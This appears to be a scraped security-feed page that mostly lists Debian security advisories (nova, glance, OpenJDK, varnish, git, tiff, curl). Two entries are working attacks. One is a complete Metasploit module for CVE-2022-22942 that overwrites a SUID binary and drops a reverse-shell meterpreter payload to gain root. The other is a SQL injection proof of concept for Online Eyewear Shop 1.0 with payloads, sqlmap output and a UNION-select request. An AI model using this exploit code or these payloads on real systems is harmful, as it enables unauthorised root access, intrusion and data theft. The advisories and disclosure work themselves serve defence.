Debian Linux Security Advisory 5337-1 - Guillaume Espanel, Pierre Libeau, Arnaud Morin and Damien Rannou discovered that missing input sanitising in the handling of VMDK images in OpenStack Compute (codenamed Nova) may result in information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5337-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffFebruary 01, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : novaCVE ID         : CVE-2022-47951Debian Bug     : 1029561Guillaume Espanel, Pierre Libeau, Arnaud Morin and Damien Rannoudiscovered that missing input sanitising in the handling of VMDK imagesin OpenStack Compute (codenamed Nova) may result in informationdisclosure.For the stable distribution (bullseye), this problem has been fixed inversion 2:22.0.1-2+deb11u1.We recommend that you upgrade your nova packages.For the detailed security status of nova please refer toits security tracker page at:https://security-tracker.debian.org/tracker/novaFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmParscACgkQEMKTtsN8Tja1gg/+MkwvOlll4HJexIgD7/wK5QD7R+1gTHJ77ywF5JP8udygdAtC7BxxmxAejlnUfDwlN5rwvZI9PR6JjedwLx7r7urckUNNaRHz9ZZdRm7n1S+3YX4Am5d7V3Dwz54NQ27GvBVoi7TTBoxDHmVZ2kX95EJYMMhGbyc1SiQx3Eg37iZII11f0CQG1VrhE6al8u19qMK/dUqmw4mPB0duUjSBK3b8wcXdgNtZP5H/rIJOfMZqaXNZUCs78zAPjDAm2BcUljOpeW/RbkwjvZMWxIZdWS8XF1iWMqeDAJxBeU39VgOIQ6c0djCK3PZscSUbT3NHJZW7okyxqqEXrGbvnJgaO0PZqIcWpatDV6s1mScWbmkT2sAQjKLlo7kDrPFVP8DzLstE+jqIzmT1dKK8X3hmIW7k6exCQINSoPIZco2tyHFrlyb42hTJIYpQLNZoEavRzH6ZYXTytvr89ldJ5w/pdtyf3S2DCkW+H4qXz03q9GyAHZN3eNMkhKmyS11/JV3GC1nL+9obCIb8PqFF075vYp0EnKsEXmyi6KL9GK6bR82i9ePo6n3eNM8+FxPRcCv8gzbWLg+pC7hrclS231C6SsDbVlYIbZBc0O4Kc8PkcnBVcjLJ71eXCIkQesZqWjnOYEshDfzG3xbWiiVOgGv0ypsB9GhKGcPGHRHEAn1k25k=U5a0-----END PGP SIGNATURE-----

Debian Security Advisory 5337-1

Debian Linux Security Advisory 5336-1 - Guillaume Espanel, Pierre Libeau, Arnaud Morin and Damien Rannou discovered that missing input sanitizing in the handling of VMDK images in Glance, the OpenStack image registry and delivery service, may result in information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5336-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffFebruary 01, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : glanceCVE ID         : CVE-2022-47951Debian Bug     : 1029563Guillaume Espanel, Pierre Libeau, Arnaud Morin and Damien Rannoudiscovered that missing input sanitising in the handling of VMDK imagesin Glance, the OpenStack image registry and delivery service, may resultin information disclosure.For the stable distribution (bullseye), this problem has been fixed inversion 2:21.0.0-2+deb11u1.We recommend that you upgrade your glance packages.For the detailed security status of glance please refer toits security tracker page at:https://security-tracker.debian.org/tracker/glanceFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmParsUACgkQEMKTtsN8TjaURw/9E7PrUVNUz6L7/r+9DHwx0eURSK67HSt1hoy8KjTwV7Fl5Smc1Rituy/ANXa9SSVDw8BzCGANjc24EHnAL9bJh8V8CANIKufsIycxcfN2iuBIZdy+uMRrhV1hxSR7i6daX5aquA/qsWRpxbRoeGybhEt0TAacTvqeK3/+rA6jCfTTcblBCfld6TSwPak6zTzGjrodo1qFh4dDgAckPpIWQ5lHOhN6L+1tqArDkpl3wkkKao8MDRNQRQKjJqLL6zD1sEwLsiQb+IUwQnIAoubAY3lUwjPGIR8bCqPqGxMCPb6/snYmmB/zA1/gwrjv4zfEdHSAZbqPzFQXfTXIidzXQzcupYZ4t0x8Bacu9LjLPeAPPNnLraFLL5qft/oLGOis4KXAsLCnAYm1S2mkFAx4W1B/gYw9uzvXrW2fuX+GsyVVjK9fRm2tvRXUV/qTTSrdvFW9T/DtFfbctaAJBbiOC7j6XpMezc8qRWoTroL6EWJEfRvWyX2bcLV9QGF6803AzHRDpLSc4o2YhpHZqathoWvylfZDQu+WXFzFhf3cmzn05S4HG1kD45QJuCbo2JmtNBUV/Idq3M8KAG1rS6tIPL+oAT9Ej9aoJhDpcHPxEpiTBMjLqgLJ/QIgOPe+kKNEciXlN0L+skk4AGwjBG6UZ/PxsNFqGz7u8FQ+DyGoelc=3y1c-----END PGP SIGNATURE-----

Debian Security Advisory 5336-1

Debian Linux Security Advisory 5335-1 - Several vulnerabilities have been discovered in the OpenJDK Java runtime, which may result in denial of service or spoofing.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5335-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
February 01, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : openjdk-17  
CVE ID         : CVE-2022-21618 CVE-2022-21619 CVE-2022-21624 CVE-2022-21628  
                 CVE-2022-39399 CVE-2023-21835 CVE-2023-21843

Several vulnerabilities have been discovered in the OpenJDK Java runtime,  
which may result in denial of service or spoofing.

For the stable distribution (bullseye), these problems have been fixed in  
version 17.0.6+10-1~deb11u1.

We recommend that you upgrade your openjdk-17 packages.

For the detailed security status of openjdk-17 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/openjdk-17

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmParr8ACgkQEMKTtsN8  
TjaUew/9Fpsfn3GMMnCaheFv/IAODAauovmI71hUQpohxEX5eL17mLWX4s5L0qtu  
HHHlexE4EtWNRk2KUtsm5oroX95mseqNhXObvX7dho0pGn8eM0N9FuJ3eXdWMxxP  
MW8Q+MADyDHuWB5/Fb6a16NpCIqzeUgS2CEMaM+6BCp2O2Mz+O0EfH/3MC9GW3z7  
sP+IUD3nm0+03J00CgZfEvRN2g1NElIerCQiSMeNC7T21V4Lz7MnVNCV1jyTvdm9  
IV5HXuVdEjeSbdC2sJbnF3geGDV5cLBcY7Il8JbcT/ADCUGkxM8wnilsiRrDj+e0  
gTuturVqUxLvjjxjpMNdLZrmv3WUMuBgFNkVpriDGXEjalsCX2yfYVQUyNGUZHCC  
o0VEuPjEKFQh8anUiugwF4ZqMfosbZcbrT7eTWFsJlAMTiBi+k8Qs3K9q9XeIW8Y  
LnMCiaTLzC+3ZL65J0r2E+CiGrie/DGaWxLaXVxt2/Qux3MOf5mKoVZSHEl7jKey  
sIIZoav9p8/Rj/3DmMLJi+visUH/aptKzbgXEAIAjSMs9pXtgu4PYZ5faAecRC9K  
G6edx+RrdXMS7nuuzH+rlCkGRJ9oszyHlcpV0cFI4/ss5ljY9rtrw7cs3qN2kZz5  
RrtXMAQc0xXLTZJTozNsqf7ael4mWfUoc809BMRobJ1m1bBTWTA=Pibq  
-----END PGP SIGNATURE-----

Debian Security Advisory 5335-1

If the vmwgfx driver fails to copy the fence_rep object to userland, it tries to recover by deallocating the (already populated) file descriptor. This is wrong, as the fd gets released via put_unused_fd() which shouldn't be used, as the fd table slot was already populated via the previous call to fd_install(). This leaves userland with a valid fd table entry pointing to a freed file object. The authors use this bug to overwrite a SUID binary with their payload and gain root. Linux kernel versions 4.14-rc1 - 5.17-rc1 are vulnerable. Successfully tested against Ubuntu 22.04.01 with kernel 5.13.12-051312-generic.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = GoodRanking  include Msf::Post::Linux::Priv  include Msf::Post::Linux::System  include Msf::Post::Linux::Kernel  include Msf::Post::File  include Msf::Exploit::EXE  include Msf::Exploit::FileDropper  include Msf::Post::Linux::Compile  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'vmwgfx Driver File Descriptor Handling Priv Esc',        'Description' => %q{          If the vmwgfx driver fails to copy the 'fence_rep' object to userland, it tries to          recover by deallocating the (already populated) file descriptor. This is          wrong, as the fd gets released via put_unused_fd() which shouldn't be used,          as the fd table slot was already populated via the previous call to          fd_install(). This leaves userland with a valid fd table entry pointing to          a free'd 'file' object.          We use this bug to overwrite a SUID binary with our payload and gain root.          Linux kernel 4.14-rc1 - 5.17-rc1 are vulnerable.          Successfully tested against Ubuntu 22.04.01 with kernel 5.13.12-051312-generic.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die', # msf module          'Mathias Krause' # original PoC, analysis        ],        'Platform' => [ 'linux' ],        'Arch' => [ ARCH_X86, ARCH_X64 ],        'SessionTypes' => [ 'shell', 'meterpreter' ],        'Targets' => [[ 'Auto', {} ]],        'Privileged' => true,        'References' => [          [ 'URL', 'https://grsecurity.net/exploiting_and_defending_against_same_type_object_reuse' ],          [ 'URL', 'https://github.com/opensrcsec/same_type_object_reuse_exploits' ],          [ 'CVE', '2022-22942' ]        ],        'DisclosureDate' => '2022-01-28',        'DefaultTarget' => 0,        'DefaultOptions' => {          'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',          'PrependFork' => true        },        'Notes' => {          'Stability' => [CRASH_OS_DOWN],          'Reliability' => [REPEATABLE_SESSION],          # seeing "BUG: Bad page cache in process <process> pfn:<5 characters>" on console          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]        }      )    )    register_advanced_options [      OptString.new('WritableDir', [ true, 'A directory where we can write and execute files', '/tmp' ])    ]  end  def base_dir    datastore['WritableDir'].to_s  end  def check    # Check the kernel version to see if its in a vulnerable range    release = kernel_release    unless Rex::Version.new(release) > Rex::Version.new('4.14-rc1') &&           Rex::Version.new(release) < Rex::Version.new('5.17-rc1')      return CheckCode::Safe("Kernel version #{release} is not vulnerable")    end    vprint_good "Kernel version #{release} appears to be vulnerable"    @driver = nil    if writable?('/dev/dri/card0') # ubuntu, RHEL      @driver = '/dev/dri/card0'    elsif writable?('/dev/dri/renderD128') # debian      @driver = '/dev/dri/renderD128'    else      return CheckCode::Safe('Unable to write to /dev/dri/card0 or /dev/dri/renderD128')    end    vprint_good("#{@driver} found writable")    @suid_target = nil    if setuid?('/bin/chfn') # ubuntu      @suid_target = '/bin/chfn'    elsif writable?('/bin/chage') # RHEL/Centos      @suid_target = '/bin/chage'    else      return CheckCode::Safe('/bin/chfn isn\'t SUID or /bin/chage not writable')    end    vprint_good("#{@suid_target} suid binary found")    if kernel_modules&.include?('vmwgfx')      return CheckCode::Appears('vmwgfx installed')    end    CheckCode::Safe('Vulnerable driver (vmwgfx) not found')  end  def exploit    # Check if we're already root    if is_root? && !datastore['ForceExploit']      fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'    end    # Make sure we can write our exploit and payload to the local system    unless writable? base_dir      fail_with Failure::BadConfig, "#{base_dir} is not writable"    end    # backup the suid binary before we overwrite it    @suid_backup = read_file(@suid_target)    path = store_loot(      @suid_target,      'application/octet-stream',      rhost,      @suid_backup,      @suid_target    )    print_good("Original #{@suid_target} backed up to #{path}")    executable_name = ".#{rand_text_alphanumeric(5..10)}"    executable_path = "#{base_dir}/#{executable_name}"    if live_compile?      vprint_status 'Live compiling exploit on system...'      payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"      c_code = exploit_source('CVE-2022-22942', 'cve-2022-22942-dc.c')      c_code = c_code.gsub('/dev/dri/card0', @driver) # ensure the right driver device is called      c_code = c_code.gsub('/bin/chfn', @suid_target) # ensure we have our suid target      c_code = c_code.gsub('/proc/self/exe', payload_path) # change exe to our payload      upload_and_compile executable_path, strip_comments(c_code)      register_files_for_cleanup(executable_path)    else      unless @suid_target == '/bin/chfn'        fail_with(Failure::BadConfig, 'Pre-compiled is only valid against Ubuntu based systems')      end      vprint_status 'Dropping pre-compiled exploit on system...'      payload_path = '/tmp/.aYd3GAMlK'      upload_and_chmodx executable_path, exploit_data('CVE-2022-22942', 'pre_compiled')    end    # Upload payload executable    print_status("Uploading payload to #{payload_path}")    upload_and_chmodx payload_path, generate_payload_exe    register_files_for_cleanup(generate_payload_exe)    print_status 'Launching exploit...'    output = cmd_exec executable_path, nil, 30    output.each_line { |line| vprint_status line.chomp }  end  def cleanup    if @suid_backup.nil?      print_bad("MANUAL replacement of trojaned #{@suid_target} is required.")    else      print_status("Replacing trojaned #{@suid_target} with original")      write_file(@suid_target, @suid_backup)    end    super  endend

vmwgfx Driver File Descriptor Handling Privilege Escalation

Online Eyewear Shop version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Online Eyewear Shop 1.0 - Product detail 'id' SQL Injection (Unauthenticated)# Date: 2023-01-02# Exploit Author: Muhammad Navaid Zafar Ansari# Vendor Homepage: https://www.sourcecodester.com/php/16089/online-eyewear-shop-website-using-php-and-mysql-free-download.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-oews.zip# Version: 1.0# Tested on: Kali Linux + PHP 8.2.1, Apache 2.4.55 (Debian)# CVE: Not Assigned Yet# References: -------------------------------------------------------------------------------------1. Description:----------------------Online Eyewear Shop 1.0 allows Unauthenticated SQL Injection via parameter 'id' in 'oews/?p=products/view_product&id=?'  Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.2. Proof of Concept:----------------------Step 1 - By visiting the url: http://localhost/oews/?p=products/view_product&id=5 just add single quote to verify the SQL Injection.Step 2 - Run sqlmap -u "http://localhost/oews/?p=products/view_product&id=3" -p id --dbms=mysqlSQLMap Response:[*] starting @ 04:49:58 /2023-02-01/[04:49:58] [INFO] testing connection to the target URLyou have not declared cookie(s), while server wants to set its own ('PHPSESSID=ft4vh3vs87t...s4nu5kh7ik'). Do you want to use those [Y/n] nsqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: p=products/view_product&id=3' AND 4759=4759 AND 'oKly'='oKly    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: p=products/view_product&id=3' AND (SELECT 5509 FROM (SELECT(SLEEP(5)))KaYM) AND 'phDK'='phDK---[04:50:00] [INFO] testing MySQL[04:50:00] [INFO] confirming MySQL[04:50:00] [INFO] the back-end DBMS is MySQLweb server operating system: Linux Debianweb application technology: Apache 2.4.55, PHPback-end DBMS: MySQL >= 5.0.0 (MariaDB fork)3. Example payload:----------------------(boolean-based)' AND 1=1 AND 'test'='test4. Burpsuite request:----------------------GET /oews/?p=products/view_product&id=5%27+and+0+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,version(),14--+- HTTP/1.1Host: localhostsec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=g491mrrn2ntmqa9akheqr3ujipConnection: close

Online Eyewear Shop 1.0 SQL Injection

Debian Linux Security Advisory 5334-1 - Martin van Kervel Smedshammer discovered that varnish, a state of the art, high-performance web accelerator, is prone to a HTTP/2 request forgery vulnerability.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5334-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoJanuary 29, 2023                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : varnishCVE ID         : CVE-2022-45060Debian Bug     : 1023751Martin van Kervel Smedshammer discovered that varnish, a state of theart, high-performance web accelerator, is prone to a HTTP/2 requestforgery vulnerability.See https://varnish-cache.org/security/VSV00011.html for details.For the stable distribution (bullseye), this problem has been fixed inversion 6.5.1-1+deb11u3.We recommend that you upgrade your varnish packages.For the detailed security status of varnish please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/varnishFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmPW4PxfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0R2Xw//ezfXNoVdUw/N3ym0RS/2RBEjxmyC4tSBihh9xNV/rMr4ez/CqNC5iH2mRYBjcEopyKZpuPiakY3eQC8Erk5TPo4Ky4zv9WPCyzV7a/nBe+bTdkL5VKciouS/tG2B4tHaCTy3oGf6gUV3hJOruNDtJCFxpl3hfADT95wIZ9rKZpP4eSJ7YvU1Sml4ZUenM73WbNP6UUzXXEcpfZbvraBs4l+SDxHrUR4t3MRAX0KXgXPVGD7dhb14A8XKfLX+I7TS6tOgVApagnaH8xCY6+gk3UCyzgWmCkITCvYZOyYNHBoB1hHbIxvJ9PhhKimdMpEwKjGNM+g974j4uOlLQlHDYo0dZIIncBICjbvB/7BgiictilcgcwcnlCofXqroJwzQS/B1K0Pk8tc6Ok/xt9k2QqRru8vYI8CcgxcdpfkVodgnPU/bSbq6a8gFNY4ZJQzVPbcg0Yjw7T0pzZjTnGpBchywzCf2ZOxVyeTNhSCEryhahYuYAJJR029fhPP4brhV0taAthorwc/AdNSdUHnO+2rrcEgpUuBArBku7n4f4dtSixcnWtr9IFDbxW3wr3LINgdNQAtPxlJuMdaI83eeTFMETztROhBt9SGI88Cn0UUC026hs5Osy+m6aHaRq6wAyqjlcf72NDIlu6UAAtc60yUvTIH9VvNKuPr6fQXbEUw==wFUO-----END PGP SIGNATURE-----

Debian Security Advisory 5334-1

Debian Linux Security Advisory 5332-1 - Multiple issues were found in Git, a distributed revision control system. An attacker may trigger remote code execution, cause local users into executing arbitrary commands, leak information from the local filesystem, and bypass restricted shell.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5332-1                   security@debian.orghttps://www.debian.org/security/                                  Aron XuJanuary 29, 2023                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : gitCVE ID         : CVE-2022-23521 CVE-2022-24765 CVE-2022-29187 CVE-2022-39253                  CVE-2022-39260 CVE-2022-41903Debian Bug     : 1014848 1022046 1029114Multiple issues were found in Git, a distributed revision control system.An attacker may trigger remote code execution, cause local users intoexecuting arbitrary commands, leak information from the local filesystem,and bypass restricted shell.This update includes two changes of behavior that may affect certain setup:  - It stops when directory traversal changes ownership from the current    user while looking for a top-level git directory, a user could make an    exception by using the new safe.directory configuration.  - The default of protocol.file.allow has been changed from "always" to    "user".For the stable distribution (bullseye), these problems have been fixed inversion 1:2.30.2-1+deb11u1.We recommend that you upgrade your git packages.For the detailed security status of git please refer toits security tracker page at:https://security-tracker.debian.org/tracker/gitFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCAAdFiEEhhz+aYQl/Bp4OTA7O1LKKgqv2VQFAmPWoBQACgkQO1LKKgqv2VQ9Ugf/amidAHmXSaPDpk9Hs52ttiUPJ6uMJRYyJI/KQ3o5eoQfdzYmVT9ACsuKXxT7Xd5JqkHZMJyABeqm42JJgOiyV5GUx2ZrsQ3M5UE2HD2keWxaJmrkj6VlzkFsqHOynAgprllBmw3RfHkyjybQEG4dtmiLk5+gJZK0MYxAaKzyeNi7dnLEllYOf+Xidn3aSk8edTVqT80jdMIfBeOn1f/Zb+9kSHyVOezku1NfYES1dnA7RaOAkKmw/JkRHYnuxpdAfkb2K1z6LmDkLWpTQU7CbOPcPpWBWgkuD6tQmKjppx5MYuDZ+hW0y6aVEI1gHfi7qbZ3+b+nxEa9CTvap0d8QA===Vh4D-----END PGP SIGNATURE-----

Debian Security Advisory 5332-1

Debian Linux Security Advisory 5333-1 - Several buffer overflow, divide by zero or out of bounds read/write vulnerabilities were discovered in tiff, the Tag Image File Format (TIFF) library and tools, which may cause denial of service when processing a crafted TIFF image.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5333-1                   security@debian.orghttps://www.debian.org/security/                                  Aron XuJanuary 29, 2023                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : tiffCVE ID         : CVE-2022-1354 CVE-2022-1355 CVE-2022-1622 CVE-2022-1623                  CVE-2022-2056 CVE-2022-2057 CVE-2022-2058 CVE-2022-2519                  CVE-2022-2520 CVE-2022-2521 CVE-2022-2867 CVE-2022-2868                  CVE-2022-2869 CVE-2022-2953 CVE-2022-3570 CVE-2022-3597                  CVE-2022-3599 CVE-2022-3627 CVE-2022-3636 CVE-2022-34526                 CVE-2022-48281Debian Bug     : 1011160 1014494 1022555 1024737 1029653Several buffer overflow, divide by zero or out of bounds read/writevulnerabilities were discovered in tiff, the Tag Image File Format (TIFF)library and tools, which may cause denial of service when processing acrafted TIFF image.For the stable distribution (bullseye), these problems have been fixed inversion 4.2.0-1+deb11u3.We recommend that you upgrade your tiff packages.For the detailed security status of tiff please refer toits security tracker page at:https://security-tracker.debian.org/tracker/tiffFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCAAdFiEEhhz+aYQl/Bp4OTA7O1LKKgqv2VQFAmPWbCMACgkQO1LKKgqv2VSytwgAhwPmD658VKUyf76i4kD+dO2fioMClzNZNZgXz9CxWPn18j67dphNDQkxK3b/Vd9n/FMnmi7hApNdUtEXdorq0355UIT4tI6IMxuywEdAou4vCl83KXx7a6xRHgzap+e+fRma3TS3NvlrvnXm02RMvULEo/QVs2/5B/cxmaPDEFpKzwXoQwO87OzifK7W6LkH6GqhC/cgGoIFjR8n9EBVY6BBzgbardsrxVElspQNrfeKg1O5L7Y26ql9bp8YwMpEfSPxX69u/75xGiT3fQpMiGsLUEUAOrGynZH1jtyTPPzGDMd+VG1S8fQUvZ+ZLnm2nAHBx+1YaGZNBcW8ocY2jA===NMoP-----END PGP SIGNATURE-----

Debian Security Advisory 5333-1

Debian Linux Security Advisory 5331-1 - Several vulnerabilities have been discovered in the OpenJDK Java runtime, which may result in denial of service or spoofing.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5331-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
January 28, 2023                      https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : openjdk-11  
CVE ID         : CVE-2022-21619 CVE-2022-21624 CVE-2022-21626 CVE-2022-21628   
                 CVE-2022-39399 CVE-2023-21835 CVE-2023-21843

Several vulnerabilities have been discovered in the OpenJDK Java runtime,  
which may result in denial of service or spoofing.

For the stable distribution (bullseye), these problems have been fixed in  
version 11.0.18+10-1~deb11u1.

We recommend that you upgrade your openjdk-11 packages.

For the detailed security status of openjdk-11 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/openjdk-11

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmPVXJgACgkQEMKTtsN8  
TjaDFA//fTs6b0krISKRClpErRG2nD2pvTm4uvGwYuRD6hZ+IZS+IXd6/sneGnTE  
KwmYRpzdgX8Kowx036816UXyBY62iQDy/sX7hD76MGh7dI4xKhZzsbLxGlaQICIC  
HEuV3i7SSeZ8Qlgzo0s1S+MYaiEU3Uj7w/hgPdw840NGgMJnrl5Xl9R2ftTDES/h  
uXErDccwvmi+zYY64mH44Utrp1aU7VTWYBK33kkGDgIC12qRk5Vtw1BcPTFHZ37g  
98rVHDZ9XikCBC+SrBDLC3wVB+Fj+YFhgAR3GYgmkMxcTDU6Awh10tpJc2d2XpQS  
QbQYNVFYk9y85wZnyvJ8r8BUIr1UPgp04RjjMyrpmnMMkAp0cXXw07gmllqzWB98  
A/3GpXwlUtvZl8BSdwD3hawCfGUfUeISZO3NeLr0NjDfj4GQuVFmhsI13TGJV8ip  
BdzAaREG3UwxS1DmQH3dHQkZ/tOaouHYrSczympUfjVTwsCaSqHBdtlYesC0t1By  
I5F3FLBqdLy2Gs9KLn8ef8BN2ecc3bMTz4wrhuKYuqa0qsKmyRLl58XyJ+8NsFSf  
JUxXn8B+6kI+OiDJSITUr87+YGGOdsY/WvcVOeL+fXcQpSV/3S0KrTRkZ/xhUjhJ  
lngIcYUBe4/65INSpXCFb4LSKC6N5JKH3ro7iUN589gaOSvRPE0=  
=HU+A  
-----END PGP SIGNATURE-----

Debian Security Advisory 5331-1

Debian Linux Security Advisory 5330-1 - Two vulnerabilities were discovered in Curl, an easy-to-use client-side URL transfer library, which could result in denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5330-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJanuary 27, 2023                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : curlCVE ID         : CVE-2022-32221 CVE-2022-43552Two vulnerabilities were discovered in Curl, an easy-to-use client-sideURL transfer library, which could result in denial of service orinformation disclosure.For the stable distribution (bullseye), these problems have been fixed inversion 7.74.0-1.3+deb11u5. This update also revises the fix forCVE-2022-27774 released in DSA-5197-1.We recommend that you upgrade your curl packages.For the detailed security status of curl please refer toits security tracker page at:https://security-tracker.debian.org/tracker/curlFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmPUCUkACgkQEMKTtsN8TjaA3g/8DBSNCu0gAsoqGfSGx42C4GDMKJBZKiW92bIVKuuJ+1Pq1VQ6msVdmOgCL/i1YFwFaxqPPQWnQQWBDNXn1oYpkVXop+Yq3ETsiX6bpF0+TCXBZRY9KsuSYyzniky7f1ueJAFjqTHWdJ/J5nfSrYSdQ/UIDNKsO2dFTD3uq1W5+qStVAdxnSOh9pMY5XgMh27urtZttTdyL+no+lRkK2jS2Ru8SgMCCmGsfUn7gFtxHn8Aqd2WEQQ9AsmgJkBjvZI2hhHqTBc96ZiTYCH6gjQHyGnRrRaZe0nZWyeSFJ8N8mblD1xequma5nPlWy5t0kKcOMVr6HvaNDbHLd51WoO9e0htjBmZXdmeEeudvkGKg00d1cPlwWmihegeuaiMHYUR/aCW1wko6FNsJ2yOZDY5iGjNNZHydrokcfB8DV/QGlFLFRXusUdX51bfylMCx1vddLTB5NQeQ7q0+eB2Rq5kM0KqdX1gsuq9id5NGSeZR/yjNPPEHbJKu2RFRridvY1H6kn2mB7YGYDGLjT/hYkoEXrBcrzPXEpBwKzsu4ih1C9eFW8DhK+iPD/U765dRV/UWIyk8uJHFmqfd4OqvG0ssVxYW5SraeOCVhToiA/vyB1mIOhYMWAitssG5xQ/DH8+4NQkGAc2Rmh4aQ6hB7QZst1+Ztqgpkcr1fods9de51k==EDu7-----END PGP SIGNATURE-----

Tag

#debian